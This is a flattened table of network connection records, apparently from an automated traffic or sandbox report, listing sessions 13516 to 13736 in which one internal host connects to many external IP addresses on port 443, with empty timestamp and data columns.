                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13516192.168.2.1359936178.51.177.5443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13517192.168.2.135263679.19.199.114443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13518192.168.2.1357020103.200.18.117443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13519192.168.2.1337098137.179.191.233443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13520192.168.2.1346000209.53.123.26443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13521192.168.2.1338892172.67.130.185443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13522192.168.2.133459825.10.131.141443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13523192.168.2.134374273.60.40.87443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13524192.168.2.135932088.136.219.253443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13525192.168.2.13588328.157.152.117443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13526192.168.2.133326027.207.205.63443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13527192.168.2.1355710130.41.36.159443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13528192.168.2.133435270.185.224.140443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13529192.168.2.1358690218.129.174.248443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13530192.168.2.1333892174.42.189.196443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13531192.168.2.1335210165.35.250.55443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13532192.168.2.13417068.75.117.220443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13533192.168.2.134830663.52.30.4443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13534192.168.2.133605275.7.202.148443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13535192.168.2.136059479.126.134.127443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13536192.168.2.134991279.31.87.66443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13537192.168.2.1338342202.164.88.82443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13538192.168.2.1333488128.218.64.148443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13539192.168.2.135004442.95.172.11443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13540192.168.2.135949477.108.174.95443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13541192.168.2.1357544190.2.56.171443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13542192.168.2.134281466.63.220.88443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13543192.168.2.1354172149.45.40.244443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13544192.168.2.135780878.232.67.242443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13545192.168.2.1336566138.119.81.132443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13546192.168.2.134481491.155.253.212443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13547192.168.2.1349560168.210.2.145443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13548192.168.2.1350308201.167.83.252443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13549192.168.2.135179682.187.73.75443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13550192.168.2.1351608208.138.253.173443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13551192.168.2.1345784169.26.23.67443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13552192.168.2.1337474109.15.62.136443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13553192.168.2.1335008191.82.187.179443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13554192.168.2.1338202142.249.167.11443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13555192.168.2.1339088187.206.35.138443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13556192.168.2.1354160209.209.188.181443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13557192.168.2.1339546194.178.88.69443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13558192.168.2.136088899.213.146.164443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13559192.168.2.133294058.244.225.252443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13560192.168.2.1348110217.204.228.55443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13561192.168.2.1336154216.244.2.184443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13562192.168.2.1354514185.236.201.156443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13563192.168.2.1343120188.84.166.170443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13564192.168.2.1354122221.152.134.102443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13565192.168.2.1351536155.155.23.35443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13566192.168.2.1334140196.48.179.111443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13567192.168.2.1359070129.148.182.12443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13568192.168.2.1339434176.237.97.227443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13569192.168.2.135303878.216.107.32443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13570192.168.2.1359958145.219.62.27443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13571192.168.2.1344168112.123.26.101443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13572192.168.2.1355546110.62.144.247443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13573192.168.2.133542888.104.102.24443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13574192.168.2.1337522156.15.196.197443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13575192.168.2.1355380131.170.25.35443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13576192.168.2.1355498151.87.11.35443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13577192.168.2.1357396204.58.47.201443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13578192.168.2.1354296138.252.36.44443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13579192.168.2.1355672155.122.73.56443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13580192.168.2.134017475.170.113.104443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13581192.168.2.135597614.114.134.77443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13582192.168.2.1345018120.153.128.123443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13583192.168.2.1358080210.118.119.227443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13584192.168.2.1356218185.73.105.72443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13585192.168.2.135383834.151.23.165443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13586192.168.2.13353561.18.96.146443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13587192.168.2.133453492.155.236.52443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13588192.168.2.1333470122.54.43.77443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13589192.168.2.134458499.53.153.47443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13590192.168.2.1355954219.155.193.10443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13591192.168.2.133726817.187.208.143443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13592192.168.2.1342952146.254.51.129443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13593192.168.2.1355676191.104.180.154443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13594192.168.2.1336808148.169.187.220443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13595192.168.2.1340104177.225.58.171443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13596192.168.2.1333454126.158.189.120443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13597192.168.2.1353764159.60.131.32443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13598192.168.2.1354548144.87.58.49443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13599192.168.2.1336714117.51.226.171443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13600192.168.2.133558269.53.105.53443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13601192.168.2.1344722209.16.102.52443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13602192.168.2.1355230125.234.20.140443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13603192.168.2.136014470.36.1.232443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13604192.168.2.1333474170.249.230.152443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13605192.168.2.1344786162.152.189.26443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13606192.168.2.1342838106.16.115.163443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13607192.168.2.133470672.83.0.83443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13608192.168.2.1354576185.102.144.40443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13609192.168.2.136045260.121.75.169443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13610192.168.2.1353314149.147.190.164443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13611192.168.2.1348910153.97.130.25443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13612192.168.2.13609004.43.0.194443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13613192.168.2.134760889.175.109.107443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13614192.168.2.1357728133.208.248.180443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13615192.168.2.1360438190.164.112.236443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13616192.168.2.1339850222.59.13.122443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13617192.168.2.1339448191.152.85.89443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13618192.168.2.1345104209.93.208.235443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13619192.168.2.1359392188.199.82.212443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13620192.168.2.133781296.147.249.123443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13621192.168.2.1349808125.141.75.125443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13622192.168.2.1350178194.23.168.188443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13623192.168.2.135664447.151.69.65443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13624192.168.2.1336644122.149.242.148443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13625192.168.2.133277050.130.87.242443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13626192.168.2.1349720138.186.175.21443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13627192.168.2.1352140165.234.78.135443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13628192.168.2.134621232.165.7.151443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13629192.168.2.135647692.35.136.57443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13630192.168.2.133820848.101.165.241443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13631192.168.2.1359364156.231.22.93443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13632192.168.2.1355102131.125.29.217443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13633192.168.2.1354688220.139.57.6443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13634192.168.2.134956662.121.205.54443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13635192.168.2.1340372135.111.179.24443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13636192.168.2.1344836188.116.17.11443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13637192.168.2.134324061.119.157.51443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13638192.168.2.1351378134.248.51.223443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13639192.168.2.1337304122.37.233.254443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13640192.168.2.1343252197.203.98.78443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13641192.168.2.1335058181.148.135.169443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13642192.168.2.1333338108.175.136.173443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13643192.168.2.1332958206.254.205.211443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13644192.168.2.1355922220.92.175.84443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13645192.168.2.133395298.37.98.74443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13646192.168.2.135462467.117.38.203443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13647192.168.2.1336060168.108.75.250443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13648192.168.2.1335710110.173.199.145443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13649192.168.2.1336570156.221.219.124443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13650192.168.2.135425454.37.234.35443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13651192.168.2.1349250104.131.27.165443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13652192.168.2.135663272.75.214.212443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13653192.168.2.1359844174.33.21.99443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13654192.168.2.135490494.229.59.123443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13655192.168.2.1354040205.179.0.68443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13656192.168.2.1347926194.219.229.194443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13657192.168.2.134640498.60.202.179443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13658192.168.2.134798875.203.173.229443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13659192.168.2.134824298.238.17.174443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13660192.168.2.1337466121.42.249.21443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13661192.168.2.133736874.175.189.20443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13662192.168.2.135496454.2.241.3443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13663192.168.2.1348504221.17.170.124443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13664192.168.2.1358140172.9.138.172443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13665192.168.2.1356388192.94.255.192443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13666192.168.2.1341986149.180.83.166443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13667192.168.2.1350142221.255.90.119443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13668192.168.2.1359166108.176.49.6443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13669192.168.2.133671494.65.7.39443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13670192.168.2.135980269.187.190.162443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13671192.168.2.13607465.87.110.254443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13672192.168.2.135809496.87.43.190443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13673192.168.2.1335980218.225.167.38443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13674192.168.2.1343504109.104.89.174443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13675192.168.2.135241674.220.64.69443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13676192.168.2.1360184182.190.147.144443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13677192.168.2.1358418183.193.73.43443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13678192.168.2.1358628129.97.25.153443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13679192.168.2.133822692.253.188.248443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13680192.168.2.133688493.63.79.58443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13681192.168.2.135549051.8.125.239443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13682192.168.2.134987870.124.50.219443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13683192.168.2.1347654143.166.50.32443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13684192.168.2.1340168125.27.161.207443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13685192.168.2.1352152180.74.13.100443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13686192.168.2.136036052.174.179.95443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13687192.168.2.1335820154.12.98.55443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13688192.168.2.134956241.110.253.214443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13689192.168.2.1338350126.14.13.228443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13690192.168.2.1332974108.248.191.253443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13691192.168.2.1347658172.176.146.216443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13692192.168.2.1334292149.60.144.27443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13693192.168.2.1338474142.10.146.77443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13694192.168.2.1343092125.92.26.213443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13695192.168.2.1346948112.50.13.17443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13696192.168.2.1334882165.18.188.228443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13697192.168.2.1333436150.76.200.17443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13698192.168.2.1349172149.47.143.211443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13699192.168.2.1347028117.174.235.112443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13700192.168.2.1341462198.148.124.111443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13701192.168.2.1353706185.4.35.28443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13702192.168.2.1346908193.181.226.85443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13703192.168.2.135052450.66.120.252443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13704192.168.2.133672036.61.199.125443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13705192.168.2.1357896163.252.225.72443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13706192.168.2.136085820.201.18.153443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13707192.168.2.135251884.84.179.222443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13708192.168.2.1357030163.140.39.196443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13709192.168.2.134405689.5.206.117443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13710192.168.2.133537424.67.89.149443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13711192.168.2.134358423.2.59.220443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13712192.168.2.1334258201.23.66.40443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13713192.168.2.134339478.240.236.119443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13714192.168.2.135556482.240.239.100443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13715192.168.2.1358738123.14.250.96443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13716192.168.2.1356306120.189.240.181443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13717192.168.2.1336384193.164.30.3443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13718192.168.2.135646077.14.4.168443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13719192.168.2.13480902.149.31.49443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13720192.168.2.1336008103.37.242.162443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13721192.168.2.135411019.193.63.108443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13722192.168.2.133967277.60.246.112443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13723192.168.2.133975471.196.80.246443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13724192.168.2.135834213.67.223.109443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13725192.168.2.1351474137.91.208.9443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13726192.168.2.1340892155.211.169.6443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13727192.168.2.134670017.184.125.12443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13728192.168.2.1346066191.167.56.191443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13729192.168.2.1340532197.29.116.28443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13730192.168.2.1338778101.110.24.189443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13731192.168.2.1352788151.249.86.61443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13732192.168.2.134867635.238.134.102443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13733192.168.2.1342436102.198.107.177443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13734192.168.2.1360062182.80.250.49443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13735192.168.2.133632668.32.58.160443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13736192.168.2.1335588159.81.58.56443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
